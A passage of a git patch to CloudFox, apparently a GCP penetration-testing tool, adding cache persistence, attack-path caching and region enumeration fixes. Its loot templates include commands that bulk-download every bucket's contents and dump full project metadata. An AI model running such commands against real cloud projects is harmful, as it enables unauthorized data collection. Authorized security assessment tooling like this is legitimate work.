func() { + if !success { + tempFile.Close() + os.Remove(tempName) + } + }() + + // Encode to temp file + encoder := gob.NewEncoder(tempFile) + if err := encoder.Encode(data); err != nil { + return fmt.Errorf("failed to encode data: %w", err) + } + + // Sync to ensure data is written to disk + if err := tempFile.Sync(); err != nil { + return fmt.Errorf("failed to sync temp file: %w", err) + } + + // Close before rename + if err := tempFile.Close(); err != nil { + return fmt.Errorf("failed to close temp file: %w", err) + } + + // Atomic rename + if err := os.Rename(tempName, filename); err != nil { + return fmt.Errorf("failed to rename temp file: %w", err) + } + + success = true + return nil +} + +// atomicWriteFile writes data to a file atomically +func atomicWriteFile(filename string, data []byte, perm os.FileMode) error { + dir := filepath.Dir(filename) + tempFile, err := os.CreateTemp(dir, ".tmp-*") + if err != nil { + return fmt.Errorf("failed to create temp file: %w", err) + } + tempName := tempFile.Name() + + success := false + defer func() { + if !success { + tempFile.Close() + os.Remove(tempName) + } + }() + + if _, err := io.WriteString(tempFile, string(data)); err != nil { + return fmt.Errorf("failed to write data: %w", err) + } + + if err := tempFile.Chmod(perm); err != nil { + return fmt.Errorf("failed to set permissions: %w", err) + } + + if err := tempFile.Sync(); err != nil { + return fmt.Errorf("failed to sync: %w", err) + } + + if err := tempFile.Close(); err != nil { + return fmt.Errorf("failed to close: %w", err) + } + + if err := os.Rename(tempName, filename); err != nil { + return fmt.Errorf("failed to rename: %w", err) + } + + success = true + return nil +} + +// CacheMetadata holds information about when the cache was created +type CacheMetadata struct { + CreatedAt time.Time `json:"created_at"` + Account string `json:"account"` + Version string `json:"version"` + ProjectsIn []string `json:"projects_in,omitempty"` // Projects used when creating cache (for attack paths) + TotalProjects int `json:"total_projects,omitempty"` // Total projects in org (for org cache) +} + +// PersistentOrgCache is the serializable version of OrgCache +type PersistentOrgCache struct { + Metadata CacheMetadata `json:"metadata"` + Organizations []CachedOrganization `json:"organizations"` + Folders []CachedFolder `json:"folders"` + AllProjects []CachedProject `json:"all_projects"` +} + +// PersistentAttackPathCache is the serializable version of attack path data +// Note: RawData is NOT saved to disk as it contains complex types that require gob registration +// and can be very large. The PathInfos are sufficient to reconstruct the cache. +type PersistentAttackPathCache struct { + Metadata CacheMetadata `json:"metadata"` + PathInfos []AttackPathInfo `json:"path_infos"` + // RawData is intentionally excluded from persistence - it's only used during runtime +} + +// GetCacheDirectory returns the cache directory for a given account +func GetCacheDirectory(baseDir, account string) string { + // Sanitize account email for use in path + sanitized := sanitizeForPath(account) + return filepath.Join(baseDir, "cached-data", "gcp", sanitized) +} + +// sanitizeForPath removes/replaces characters that are problematic in file paths +func sanitizeForPath(s string) string { + // Replace @ and other special chars with underscores + result := make([]byte, 0, len(s)) + for i := 0; i < len(s); i++ { + c := s[i] + if (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9') || c == '-' || c == '_' || c == '.' { + result = append(result, c) + } else { + result = append(result, '_') + } + } + return string(result) +} + +// OrgCacheFilename returns the filename for org cache +func OrgCacheFilename() string { + return "org-cache.gob" +} + +// AttackPathCacheFilename returns the filename for attack path cache +func AttackPathCacheFilename() string { + return "attack-paths.gob" +} + +// SaveOrgCacheToFile saves the org cache to a gob file using atomic write +func SaveOrgCacheToFile(cache *OrgCache, baseDir, account, version string) error { + cacheDir := GetCacheDirectory(baseDir, account) + if err := os.MkdirAll(cacheDir, 0755); err != nil { + return fmt.Errorf("failed to create cache directory: %w", err) + } + + persistent := PersistentOrgCache{ + Metadata: CacheMetadata{ + CreatedAt: time.Now(), + Account: account, + Version: version, + TotalProjects: len(cache.AllProjects), + }, + Organizations: cache.Organizations, + Folders: cache.Folders, + AllProjects: cache.AllProjects, + } + + filename := filepath.Join(cacheDir, OrgCacheFilename()) + + // Use atomic write: write to temp file, then rename + if err := atomicWriteGob(filename, persistent); err != nil { + return fmt.Errorf("failed to write cache file: %w", err) + } + + // Also save JSON for debugging/inspection + jsonFilename := filepath.Join(cacheDir, "org-cache.json") + jsonData, err := json.MarshalIndent(persistent, "", " ") + if err == nil { + atomicWriteFile(jsonFilename, jsonData, 0644) + } + + return nil +} + +// LoadOrgCacheFromFile loads the org cache from a gob file +func LoadOrgCacheFromFile(baseDir, account string) (*OrgCache, *CacheMetadata, error) { + cacheDir := GetCacheDirectory(baseDir, account) + filename := filepath.Join(cacheDir, OrgCacheFilename()) + + file, err := os.Open(filename) + if err != nil { + if os.IsNotExist(err) { + return nil, nil, nil // Cache doesn't exist, not an error + } + return nil, nil, fmt.Errorf("failed to open cache file: %w", err) + } + defer file.Close() + + var persistent PersistentOrgCache + decoder := gob.NewDecoder(file) + if err := decoder.Decode(&persistent); err != nil { + return nil, nil, fmt.Errorf("failed to decode cache: %w", err) + } + + // Convert to in-memory cache + cache := NewOrgCache() + for _, org := range persistent.Organizations { + cache.AddOrganization(org) + } + for _, folder := range persistent.Folders { + cache.AddFolder(folder) + } + for _, project := range persistent.AllProjects { + cache.AddProject(project) + } + cache.MarkPopulated() + + return cache, &persistent.Metadata, nil +} + +// OrgCacheExists checks if an org cache file exists +func OrgCacheExists(baseDir, account string) bool { + cacheDir := GetCacheDirectory(baseDir, account) + filename := filepath.Join(cacheDir, OrgCacheFilename()) + _, err := os.Stat(filename) + return err == nil +} + +// SaveAttackPathCacheToFile saves attack path data to a gob file using atomic write +func SaveAttackPathCacheToFile(cache *AttackPathCache, projectIDs []string, baseDir, account, version string) error { + cacheDir := GetCacheDirectory(baseDir, account) + if err := os.MkdirAll(cacheDir, 0755); err != nil { + return fmt.Errorf("failed to create cache directory: %w", err) + } + + // Extract path infos from cache + var pathInfos []AttackPathInfo + for principal, pathMap := range cache.PrincipalPaths { + for pathType, methods := range pathMap { + for _, method := range methods { + pathInfos = append(pathInfos, AttackPathInfo{ + Principal: principal, + Method: method.Method, + PathType: pathType, + Category: method.Category, + RiskLevel: method.RiskLevel, + Target: method.Target, + Permissions: method.Permissions, + ScopeType: method.ScopeType, + ScopeID: method.ScopeID, + }) + } + } + } + + persistent := PersistentAttackPathCache{ + Metadata: CacheMetadata{ + CreatedAt: time.Now(), + Account: account, + Version: version, + ProjectsIn: projectIDs, + }, + PathInfos: pathInfos, + // Note: RawData is not saved - it contains complex types and is only needed at runtime + } + + filename := filepath.Join(cacheDir, AttackPathCacheFilename()) + + // Use atomic write: write to temp file, then rename + if err := atomicWriteGob(filename, persistent); err != nil { + return fmt.Errorf("failed to write cache file: %w", err) + } + + // Also save JSON metadata for debugging (without raw data which can be huge) + metaFilename := filepath.Join(cacheDir, "attack-paths-meta.json") + metaData := struct { + Metadata CacheMetadata `json:"metadata"` + PathCount int `json:"path_count"` + PrivescCount int `json:"privesc_count"` + ExfilCount int `json:"exfil_count"` + LateralCount int `json:"lateral_count"` + }{ + Metadata: persistent.Metadata, + PathCount: len(pathInfos), + PrivescCount: cache.PrivescCount, + ExfilCount: cache.ExfilCount, + LateralCount: cache.LateralCount, + } + jsonData, err := json.MarshalIndent(metaData, "", " ") + if err == nil { + atomicWriteFile(metaFilename, jsonData, 0644) + } + + return nil +} + +// LoadAttackPathCacheFromFile loads attack path data from a gob file +func LoadAttackPathCacheFromFile(baseDir, account string) (*AttackPathCache, *CacheMetadata, error) { + cacheDir := GetCacheDirectory(baseDir, account) + filename := filepath.Join(cacheDir, AttackPathCacheFilename()) + + file, err := os.Open(filename) + if err != nil { + if os.IsNotExist(err) { + return nil, nil, nil // Cache doesn't exist, not an error + } + return nil, nil, fmt.Errorf("failed to open cache file: %w", err) + } + defer file.Close() + + var persistent PersistentAttackPathCache + decoder := gob.NewDecoder(file) + if err := decoder.Decode(&persistent); err != nil { + return nil, nil, fmt.Errorf("failed to decode cache: %w", err) + } + + // Convert to in-memory cache + cache := NewAttackPathCache() + cache.PopulateFromPaths(persistent.PathInfos) + // Note: RawData is not loaded from disk - it's populated at runtime when needed + + return cache, &persistent.Metadata, nil +} + +// AttackPathCacheExists checks if an attack path cache file exists +func AttackPathCacheExists(baseDir, account string) bool { + cacheDir := GetCacheDirectory(baseDir, account) + filename := filepath.Join(cacheDir, AttackPathCacheFilename()) + _, err := os.Stat(filename) + return err == nil +} + +// GetCacheAge returns how old a cache file is +func GetCacheAge(baseDir, account, cacheType string) (time.Duration, error) { + cacheDir := GetCacheDirectory(baseDir, account) + var filename string + switch cacheType { + case "org": + filename = filepath.Join(cacheDir, OrgCacheFilename()) + case "attack-paths": + filename = filepath.Join(cacheDir, AttackPathCacheFilename()) + default: + return 0, fmt.Errorf("unknown cache type: %s", cacheType) + } + + info, err := os.Stat(filename) + if err != nil { + return 0, err + } + + return time.Since(info.ModTime()), nil +} + +// IsCacheStale checks if a cache is older than the given duration +func IsCacheStale(baseDir, account, cacheType string, maxAge time.Duration) bool { + age, err := GetCacheAge(baseDir, account, cacheType) + if err != nil { + return true // If we can't determine age, consider it stale + } + return age > maxAge +} + +// DeleteCache removes a cache file +func DeleteCache(baseDir, account, cacheType string) error { + cacheDir := GetCacheDirectory(baseDir, account) + var filename string + switch cacheType { + case "org": + filename = filepath.Join(cacheDir, OrgCacheFilename()) + // Also remove JSON + os.Remove(filepath.Join(cacheDir, "org-cache.json")) + case "attack-paths": + filename = filepath.Join(cacheDir, AttackPathCacheFilename()) + // Also remove JSON meta + os.Remove(filepath.Join(cacheDir, "attack-paths-meta.json")) + default: + return fmt.Errorf("unknown cache type: %s", cacheType) + } + + return os.Remove(filename) +} From de141300e95b22aa2ea72b75e88890d62dc7572b Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Wed, 4 Feb 2026 20:35:44 -0500 Subject: [PATCH 35/48] fixed enumerate regions where permissions were sometimes denied --- cli/gcp.go | 56 +-- gcp/commands/assetinventory.go | 34 +- gcp/commands/buckets.go | 6 +- gcp/commands/crossproject.go | 56 ++- gcp/commands/endpoints.go | 70 ++-- gcp/commands/instances.go | 323 +++++++---------- gcp/commands/inventory.go | 135 ++++--- gcp/commands/publicaccess.go | 5 +- .../certManagerService/certManagerService.go | 74 ++-- .../cloudrunService/cloudrunService.go | 24 +- .../composerService/composerService.go | 28 +- .../computeEngineService.go | 235 ++++++++++-- .../dataprocService/dataprocService.go | 17 +- gcp/services/iapService/iapService.go | 7 +- .../loadbalancerService.go | 72 ++-- gcp/services/regionService/regionService.go | 335 ++++++++++++++++++ .../resourceIAMService/resourceIAMService.go | 7 +- .../schedulerService/schedulerService.go | 27 +- internal/gcp/org_cache.go | 26 ++ internal/gcp/persistent_cache.go | 4 + internal/gcp/regions.go | 201 +++++++++++ 21 files changed, 1215 insertions(+), 527 deletions(-) create mode 100644 gcp/services/regionService/regionService.go create mode 100644 internal/gcp/regions.go diff --git a/cli/gcp.go b/cli/gcp.go index ae8641a6..71d87198 100644 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -321,18 +321,24 @@ func loadOrRunAttackPathAnalysis(ctx context.Context, forceRefresh bool) *gcpint // Check if cache exists and we're not forcing refresh if !forceRefresh && gcpinternal.AttackPathCacheExists(GCPOutputDirectory, account) { - cache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(GCPOutputDirectory, account) - if err == nil && cache != nil { + // Check if cache is stale (older than 24 hours) + if gcpinternal.IsCacheStale(GCPOutputDirectory, account, "attack-paths", gcpinternal.DefaultCacheExpiration) { age, _ := gcpinternal.GetCacheAge(GCPOutputDirectory, account, "attack-paths") - privesc, exfil, lateral := cache.GetStats() - GCPLogger.InfoM(fmt.Sprintf("Loaded attack path cache from disk (age: %s, %d projects analyzed, P:%d E:%d L:%d)", - formatDuration(age), len(metadata.ProjectsIn), privesc, exfil, lateral), "gcp") - return cache - } - if err != nil { - GCPLogger.InfoM(fmt.Sprintf("Could not load attack path cache: %v, re-analyzing...", err), "gcp") - // Delete corrupted cache file - gcpinternal.DeleteCache(GCPOutputDirectory, account, "attack-paths") + GCPLogger.InfoM(fmt.Sprintf("Attack path cache is stale (age: %s > 24h), refreshing...", formatDuration(age)), "gcp") + } else { + cache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(GCPOutputDirectory, account) + if err == nil && cache != nil { + age, _ := gcpinternal.GetCacheAge(GCPOutputDirectory, account, "attack-paths") + privesc, exfil, lateral := cache.GetStats() + GCPLogger.InfoM(fmt.Sprintf("Loaded attack path cache from disk (age: %s, %d projects analyzed, P:%d E:%d L:%d)", + formatDuration(age), len(metadata.ProjectsIn), privesc, exfil, lateral), "gcp") + return cache + } + if err != nil { + GCPLogger.InfoM(fmt.Sprintf("Could not load attack path cache: %v, re-analyzing...", err), "gcp") + // Delete corrupted cache file + gcpinternal.DeleteCache(GCPOutputDirectory, account, "attack-paths") + } } } @@ -429,17 +435,23 @@ func runPrivescAndPopulateCache(ctx context.Context) *gcpinternal.PrivescCache { func loadOrPopulateOrgCache(account string, forceRefresh bool) *gcpinternal.OrgCache { // Check if cache exists and we're not forcing refresh if !forceRefresh && gcpinternal.OrgCacheExists(GCPOutputDirectory, account) { - cache, metadata, err := gcpinternal.LoadOrgCacheFromFile(GCPOutputDirectory, account) - if err == nil && cache != nil { + // Check if cache is stale (older than 24 hours) + if gcpinternal.IsCacheStale(GCPOutputDirectory, account, "org", gcpinternal.DefaultCacheExpiration) { age, _ := gcpinternal.GetCacheAge(GCPOutputDirectory, account, "org") - GCPLogger.InfoM(fmt.Sprintf("Loaded org cache from disk (age: %s, %d projects)", - formatDuration(age), metadata.TotalProjects), "gcp") - return cache - } - if err != nil { - GCPLogger.InfoM(fmt.Sprintf("Could not load org cache: %v, re-enumerating...", err), "gcp") - // Delete corrupted cache file - gcpinternal.DeleteCache(GCPOutputDirectory, account, "org") + GCPLogger.InfoM(fmt.Sprintf("Org cache is stale (age: %s > 24h), refreshing...", formatDuration(age)), "gcp") + } else { + cache, metadata, err := gcpinternal.LoadOrgCacheFromFile(GCPOutputDirectory, account) + if err == nil && cache != nil { + age, _ := gcpinternal.GetCacheAge(GCPOutputDirectory, account, "org") + GCPLogger.InfoM(fmt.Sprintf("Loaded org cache from disk (age: %s, %d projects)", + formatDuration(age), metadata.TotalProjects), "gcp") + return cache + } + if err != nil { + GCPLogger.InfoM(fmt.Sprintf("Could not load org cache: %v, re-enumerating...", err), "gcp") + // Delete corrupted cache file + gcpinternal.DeleteCache(GCPOutputDirectory, account, "org") + } } } @@ -572,7 +584,7 @@ func init() { GCPCommands.PersistentFlags().BoolVar(&GCPFlatOutput, "flat-output", false, "Use legacy flat output structure instead of hierarchical per-project directories") GCPCommands.PersistentFlags().BoolVar(&GCPAttackPaths, "attack-paths", false, "Run attack path analysis (privesc/exfil/lateral) and add Attack Paths column to module output") GCPCommands.PersistentFlags().BoolVar(&GCPOrgCache, "org-cache", false, "Enumerate all accessible orgs/folders/projects and cache for cross-project analysis") - GCPCommands.PersistentFlags().BoolVar(&GCPRefreshCache, "refresh-cache", false, "Force re-enumeration of cached data even if cache files exist") + GCPCommands.PersistentFlags().BoolVar(&GCPRefreshCache, "refresh-cache", false, "Force re-enumeration of cached data (cache auto-expires after 24 hours)") // Available commands GCPCommands.AddCommand( diff --git a/gcp/commands/assetinventory.go b/gcp/commands/assetinventory.go index 09dea50d..00cdc3df 100644 --- a/gcp/commands/assetinventory.go +++ b/gcp/commands/assetinventory.go @@ -28,16 +28,28 @@ var ( var GCPAssetInventoryCommand = &cobra.Command{ Use: globals.GCP_ASSET_INVENTORY_MODULE_NAME, - Aliases: []string{"assets", "inventory", "cai", "resource-graph"}, - Short: "Enumerate Cloud Asset Inventory with optional dependency analysis", - Long: `Enumerate resources using Cloud Asset Inventory API. - -Features: -- Lists all assets in a project -- Provides asset counts by type -- Can check IAM policies for public access -- Supports filtering by asset type -- Analyzes resource dependencies and cross-project relationships + Aliases: []string{"assets", "cai", "resource-graph"}, + Short: "Deep asset analysis with IAM and dependencies (requires Cloud Asset API)", + Long: `Deep resource analysis using Cloud Asset Inventory API. + +USE THIS COMMAND WHEN: +- You need IAM policy analysis (public access detection) +- You want to analyze resource dependencies and cross-project relationships +- You need to filter by specific asset types +- Cloud Asset API is enabled in your projects + +REQUIRES: Cloud Asset API (cloudasset.googleapis.com) to be enabled. +To enable: gcloud services enable cloudasset.googleapis.com --project=PROJECT_ID + +If Cloud Asset API is not enabled, use 'inventory' command instead for a quick +overview that works without the API. + +FEATURES: +- Lists all assets in a project (complete coverage via Asset API) +- Provides asset counts by type (--counts) +- Checks IAM policies for public access (--iam) +- Analyzes resource dependencies and cross-project relationships (--dependencies) +- Supports filtering by asset type (--types) - Generates query templates for common security use cases Flags can be combined to run multiple analyses in a single run. @@ -47,8 +59,8 @@ Examples: cloudfox gcp asset-inventory -p my-project --counts cloudfox gcp asset-inventory -p my-project --iam cloudfox gcp asset-inventory -p my-project --dependencies - cloudfox gcp asset-inventory -p my-project --counts --iam --dependencies cloudfox gcp asset-inventory -p my-project --all + cloudfox gcp asset-inventory -A --iam # All projects, check public access cloudfox gcp asset-inventory -p my-project --types compute.googleapis.com/Instance,storage.googleapis.com/Bucket`, Run: runGCPAssetInventoryCommand, } diff --git a/gcp/commands/buckets.go b/gcp/commands/buckets.go index 7d8c5403..d42e1f48 100644 --- a/gcp/commands/buckets.go +++ b/gcp/commands/buckets.go @@ -204,8 +204,9 @@ func (m *BucketsModule) addBucketToLoot(projectID string, bucket CloudStorageSer "gsutil ls -r gs://%s/**\n"+ "# Get bucket size:\n"+ "gsutil du -s gs://%s/\n"+ - "# Download all contents:\n"+ - "gsutil -m cp -r gs://%s/ ./loot/%s/\n"+ + "# Download all contents (create directory first):\n"+ + "mkdir -p bucket/%s/\n"+ + "gsutil -m cp -r gs://%s/ bucket/%s/\n"+ "# Check for public access:\n"+ "curl -s https://storage.googleapis.com/%s/ | head -20\n\n", bucket.Name, bucket.ProjectID, bucket.Location, @@ -215,6 +216,7 @@ func (m *BucketsModule) addBucketToLoot(projectID string, bucket CloudStorageSer bucket.Name, bucket.Name, bucket.Name, + bucket.Name, bucket.Name, bucket.Name, bucket.Name, ) diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go index 8443e66d..9dfb0142 100644 --- a/gcp/commands/crossproject.go +++ b/gcp/commands/crossproject.go @@ -35,17 +35,28 @@ Features: - Highlights service accounts spanning trust boundaries - Shows impersonation targets when --attack-paths flag is used -TIP: For a complete picture including impersonation targets and attack paths, -use the global --attack-paths flag: +RECOMMENDED: For comprehensive cross-project analysis, use with -A and --org-cache +to automatically discover all accessible projects in your organization: - cloudfox gcp crossproject -l projects.txt --attack-paths + cloudfox gcp crossproject -A --org-cache --attack-paths + +This will: +- Discover all projects you have access to (--org-cache) +- Analyze cross-project patterns across all of them (-A) +- Include impersonation targets and attack paths (--attack-paths) +- Show "Trust Boundary" column indicating if target is Internal, External, or Unknown -This will populate the Target Type, Target Principal, and Attack Path columns -with detailed information about what service accounts can be impersonated and -what privesc/exfil/lateral movement capabilities exist. +TRUST BOUNDARY COLUMN (requires --org-cache): +- "Internal" - Target project is within your organization +- "External" - Target project is outside your organization (trust boundary crossing!) +- "Unknown" - Org cache not available, cannot determine boundary + +ALTERNATIVE: Specify projects manually with -l for a project list file: + + cloudfox gcp crossproject -l projects.txt --attack-paths WARNING: Requires multiple projects to be specified for effective analysis. -Use -p for single project or -l for project list file.`, +Single project analysis (-p) will have limited results.`, Run: runGCPCrossProjectCommand, } @@ -62,6 +73,7 @@ type CrossProjectModule struct { CrossProjectPubSub []crossprojectservice.CrossProjectPubSubExport LootMap map[string]*internal.LootFile AttackPathCache *gcpinternal.AttackPathCache + OrgCache *gcpinternal.OrgCache } // ------------------------------ @@ -119,6 +131,17 @@ func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger } } + // Get org cache from context (populated by --org-cache flag or all-checks) + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + + // If no context cache, try loading from disk cache + if m.OrgCache == nil || !m.OrgCache.IsPopulated() { + diskCache, _, err := gcpinternal.LoadOrgCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + m.OrgCache = diskCache + } + } + logger.InfoM(fmt.Sprintf("Analyzing cross-project access patterns across %d project(s)...", len(m.ProjectIDs)), globals.GCP_CROSSPROJECT_MODULE_NAME) svc := crossprojectservice.New() @@ -316,7 +339,16 @@ func (m *CrossProjectModule) getHeader() []string { "Target Principal", "Target Role", "Attack Path", + "Trust Boundary", + } +} + +// getTargetProjectScope returns the scope of the target project relative to the org +func (m *CrossProjectModule) getTargetProjectScope(targetProjectID string) string { + if m.OrgCache == nil || !m.OrgCache.IsPopulated() { + return "Unknown" } + return m.OrgCache.GetProjectScope(targetProjectID) } // getImpersonationTarget checks if a role grants impersonation capabilities and returns the target @@ -459,6 +491,7 @@ func (m *CrossProjectModule) buildTableBodyByTargetProject() map[string][][]stri role := cleanRole(binding.Role) attackPath := m.getAttackPathForTarget(binding.TargetProject, binding.Principal) targetType, targetPrincipal := m.getImpersonationTarget(binding.Principal, binding.Role, binding.TargetProject) + trustBoundary := m.getTargetProjectScope(binding.TargetProject) row := []string{ m.GetProjectName(binding.SourceProject), @@ -470,6 +503,7 @@ func (m *CrossProjectModule) buildTableBodyByTargetProject() map[string][][]stri targetPrincipal, role, attackPath, + trustBoundary, } bodyByProject[binding.TargetProject] = append(bodyByProject[binding.TargetProject], row) } @@ -488,6 +522,7 @@ func (m *CrossProjectModule) buildTableBodyByTargetProject() map[string][][]stri role = cleanRole(role) attackPath := m.getAttackPathForTarget(targetProject, "serviceAccount:"+sa.Email) targetType, targetPrincipal := m.getImpersonationTarget(sa.Email, role, targetProject) + trustBoundary := m.getTargetProjectScope(targetProject) row := []string{ m.GetProjectName(sa.ProjectID), @@ -499,6 +534,7 @@ func (m *CrossProjectModule) buildTableBodyByTargetProject() map[string][][]stri targetPrincipal, role, attackPath, + trustBoundary, } bodyByProject[targetProject] = append(bodyByProject[targetProject], row) } @@ -512,6 +548,7 @@ func (m *CrossProjectModule) buildTableBodyByTargetProject() map[string][][]stri cleanedRole := cleanRole(role) attackPath := m.getAttackPathForTarget(path.TargetProject, path.SourcePrincipal) targetType, targetPrincipal := m.getImpersonationTarget(path.SourcePrincipal, role, path.TargetProject) + trustBoundary := m.getTargetProjectScope(path.TargetProject) row := []string{ m.GetProjectName(path.SourceProject), @@ -523,6 +560,7 @@ func (m *CrossProjectModule) buildTableBodyByTargetProject() map[string][][]stri targetPrincipal, cleanedRole, attackPath, + trustBoundary, } bodyByProject[path.TargetProject] = append(bodyByProject[path.TargetProject], row) } @@ -538,6 +576,7 @@ func (m *CrossProjectModule) buildTableBodyByTargetProject() map[string][][]stri } dest = fmt.Sprintf("%s (%s)", sink.DestinationType, filter) } + trustBoundary := m.getTargetProjectScope(sink.TargetProject) row := []string{ m.GetProjectName(sink.SourceProject), @@ -549,6 +588,7 @@ func (m *CrossProjectModule) buildTableBodyByTargetProject() map[string][][]stri "-", dest, "-", + trustBoundary, } bodyByProject[sink.TargetProject] = append(bodyByProject[sink.TargetProject], row) } @@ -560,6 +600,7 @@ func (m *CrossProjectModule) buildTableBodyByTargetProject() map[string][][]stri destName := extractCrossProjectResourceName(export.ExportDest) dest = fmt.Sprintf("%s: %s", export.ExportType, destName) } + trustBoundary := m.getTargetProjectScope(export.TargetProject) row := []string{ m.GetProjectName(export.SourceProject), @@ -571,6 +612,7 @@ func (m *CrossProjectModule) buildTableBodyByTargetProject() map[string][][]stri "-", dest, "-", + trustBoundary, } bodyByProject[export.TargetProject] = append(bodyByProject[export.TargetProject], row) } diff --git a/gcp/commands/endpoints.go b/gcp/commands/endpoints.go index d838965d..edb10ee7 100644 --- a/gcp/commands/endpoints.go +++ b/gcp/commands/endpoints.go @@ -242,41 +242,45 @@ func (m *EndpointsModule) getStaticExternalIPs(ctx context.Context, svc *compute return nil }) - // Regional addresses - regionsReq := svc.Regions.List(projectID) - _ = regionsReq.Pages(ctx, func(page *compute.RegionList) error { - for _, region := range page.Items { - addrReq := svc.Addresses.List(projectID, region.Name) - _ = addrReq.Pages(ctx, func(addrPage *compute.AddressList) error { - for _, addr := range addrPage.Items { - if addr.AddressType == "EXTERNAL" { - user := "" - if len(addr.Users) > 0 { - user = extractResourceName(addr.Users[0]) - } - security := "" - if user == "" { - security = "Unused" - } - ep := Endpoint{ - ProjectID: projectID, - Name: addr.Name, - Type: "Static IP", - ExternalIP: addr.Address, - Protocol: "TCP/UDP", - Port: "ALL", - Resource: user, - ResourceType: "Address", - Region: region.Name, - Status: addr.Status, - IsExternal: true, - Security: security, - } - m.addEndpoint(projectID, ep) + // Regional addresses - use AggregatedList to avoid needing compute.regions.list permission + addrReq := svc.Addresses.AggregatedList(projectID) + _ = addrReq.Pages(ctx, func(page *compute.AddressAggregatedList) error { + for scopeName, scopedList := range page.Items { + if scopedList.Addresses == nil { + continue + } + // Extract region from scope name (format: "regions/us-central1") + regionName := "unknown" + if strings.HasPrefix(scopeName, "regions/") { + regionName = strings.TrimPrefix(scopeName, "regions/") + } + for _, addr := range scopedList.Addresses { + if addr.AddressType == "EXTERNAL" { + user := "" + if len(addr.Users) > 0 { + user = extractResourceName(addr.Users[0]) + } + security := "" + if user == "" { + security = "Unused" + } + ep := Endpoint{ + ProjectID: projectID, + Name: addr.Name, + Type: "Static IP", + ExternalIP: addr.Address, + Protocol: "TCP/UDP", + Port: "ALL", + Resource: user, + ResourceType: "Address", + Region: regionName, + Status: addr.Status, + IsExternal: true, + Security: security, } + m.addEndpoint(projectID, ep) } - return nil - }) + } } return nil }) diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index 4002e4d4..cf00f57a 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -1,16 +1,18 @@ package commands import ( - "github.com/BishopFox/cloudfox/gcp/shared" "context" + "encoding/json" "fmt" + "sort" "strings" "sync" ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) @@ -165,15 +167,21 @@ func (m *InstancesModule) processProject(ctx context.Context, projectID string, Name: "instances-commands", Contents: "# GCP Compute Engine Instance Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } + m.LootMap[projectID]["instances-metadata"] = &internal.LootFile{ + Name: "instances-metadata", + Contents: "", + } } // Generate loot for each instance for _, instance := range instances { m.addInstanceToLoot(projectID, instance) + m.addInstanceMetadataToLoot(projectID, instance) } // Add project metadata to loot m.addProjectMetadataToLoot(projectID, projectMeta) + m.addProjectMetadataFullToLoot(projectID, projectMeta) m.mu.Unlock() if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { @@ -184,6 +192,8 @@ func (m *InstancesModule) processProject(ctx context.Context, projectID string, // ------------------------------ // Loot File Management // ------------------------------ + +// addProjectMetadataToLoot adds project metadata commands to the commands loot file func (m *InstancesModule) addProjectMetadataToLoot(projectID string, meta *ComputeEngineService.ProjectMetadataInfo) { if meta == nil { return @@ -196,134 +206,72 @@ func (m *InstancesModule) addProjectMetadataToLoot(projectID string, meta *Compu lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ - "# PROJECT-LEVEL METADATA (Project: %s)\n"+ + "# PROJECT-LEVEL COMMANDS (Project: %s)\n"+ "# ==========================================\n"+ - "# OS Login: %v, OS Login 2FA: %v, Serial Port: %v\n", - meta.ProjectID, meta.OSLoginEnabled, meta.OSLogin2FAEnabled, meta.SerialPortEnabled, + "\n# Get project metadata:\n"+ + "gcloud compute project-info describe --project=%s --format='yaml(commonInstanceMetadata)'\n\n", + meta.ProjectID, meta.ProjectID, ) +} - // Project-level SSH keys - if meta.HasProjectSSHKeys && len(meta.ProjectSSHKeys) > 0 { - lootFile.Contents += fmt.Sprintf( - "# Project SSH Keys: %d (apply to ALL instances not blocking project keys)\n", - len(meta.ProjectSSHKeys), - ) - for _, key := range meta.ProjectSSHKeys { - lootFile.Contents += fmt.Sprintf("# %s\n", key) - } - } - - // Project-level startup script - if meta.HasProjectStartupScript && meta.ProjectStartupScript != "" { - lootFile.Contents += fmt.Sprintf( - "#\n# PROJECT STARTUP SCRIPT (runs on ALL instances):\n"+ - "# ------- BEGIN -------\n"+ - "%s\n"+ - "# ------- END -------\n", - meta.ProjectStartupScript, - ) +// addProjectMetadataFullToLoot adds full project metadata to the metadata loot file +func (m *InstancesModule) addProjectMetadataFullToLoot(projectID string, meta *ComputeEngineService.ProjectMetadataInfo) { + if meta == nil { + return } - // Custom metadata keys at project level - if len(meta.CustomMetadataKeys) > 0 { - lootFile.Contents += "# Custom metadata keys (may contain secrets):\n" - for _, key := range meta.CustomMetadataKeys { - lootFile.Contents += fmt.Sprintf("# - %s\n", key) - } + lootFile := m.LootMap[projectID]["instances-metadata"] + if lootFile == nil { + return } lootFile.Contents += fmt.Sprintf( - "\n# Get project metadata:\n"+ - "gcloud compute project-info describe --project=%s --format='yaml(commonInstanceMetadata)'\n\n", + "================================================================================\n"+ + "PROJECT METADATA: %s\n"+ + "================================================================================\n\n", meta.ProjectID, ) + + // Output all raw metadata as JSON for completeness + if len(meta.RawMetadata) > 0 { + // Sort keys for consistent output + var keys []string + for k := range meta.RawMetadata { + keys = append(keys, k) + } + sort.Strings(keys) + + for _, key := range keys { + value := meta.RawMetadata[key] + lootFile.Contents += fmt.Sprintf("--- %s ---\n%s\n\n", key, value) + } + } else { + lootFile.Contents += "(No project-level metadata found)\n\n" + } } +// addInstanceToLoot adds instance commands to the commands loot file func (m *InstancesModule) addInstanceToLoot(projectID string, instance ComputeEngineService.ComputeEngineInfo) { lootFile := 